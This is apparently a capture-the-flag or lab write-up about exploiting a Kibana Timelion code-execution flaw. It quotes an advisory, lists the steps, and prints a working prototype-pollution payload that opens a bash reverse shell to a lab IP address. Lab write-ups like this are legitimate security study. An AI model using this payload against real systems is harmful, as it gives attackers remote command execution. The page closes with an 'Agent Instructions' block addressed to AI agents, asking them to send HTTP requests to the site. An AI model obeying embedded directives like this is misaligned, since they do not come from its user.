# Exploitation This machine has taught me to not rely fully on searchsploit since there will be times that exploits will not come up. So we just google. {% embed url="" %} Looking it up lead me here, this website said the following: > Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. Which is good because now this means that we could execue commands and get a reverse shell. [![kibana](https://user-images.githubusercontent.com/5891788/67185780-ddc1bd00-f3e6-11e9-8ea4-c2681c5e6b6c.png)](https://user-images.githubusercontent.com/5891788/67185780-ddc1bd00-f3e6-11e9-8ea4-c2681c5e6b6c.png) ### Exploit 1. Open Kibana 2. Past one of the following payload into the Timelion visualizer 3. Click run 4. On the left panel click on Canvas 5. Your reverse shell should pop ! :) These are the exact instructions from the author. ``` .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.49.242/5601 0>&1\'");//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') ``` I also had to cycle through open ports. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lyethar.gitbook.io/sirol/exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.